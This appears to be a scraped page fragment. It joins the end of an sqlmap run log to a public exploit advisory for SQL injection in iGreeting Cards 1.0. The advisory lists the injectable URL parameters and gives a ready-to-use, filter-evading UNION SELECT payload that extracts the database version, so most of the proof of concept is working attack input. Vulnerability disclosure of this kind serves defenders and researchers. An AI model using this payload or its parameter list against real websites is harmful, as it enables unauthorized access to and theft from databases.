(Internal Server Error) - 2714 times • [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 19:36:55
  25. Hacking

    # # # # # # Exploit Title: iGreeting Cards 1.0 - SQL Injection # Dork: N/A # Date: 04.09.2017 # Vendor Homepage: http://coryapp.com/ # Software Link: http://coryapp.com/?product&index # Demo: http://coryapp.com/demo/greetingcards/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?index&search&k=[SQL] # # eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+- # # http://localhost/[PATH]/index.php?index&index&p=[SQL] # # http://localhost/[PATH]/index.php?category&index&id=[SQL] # # Etc.. # # # # #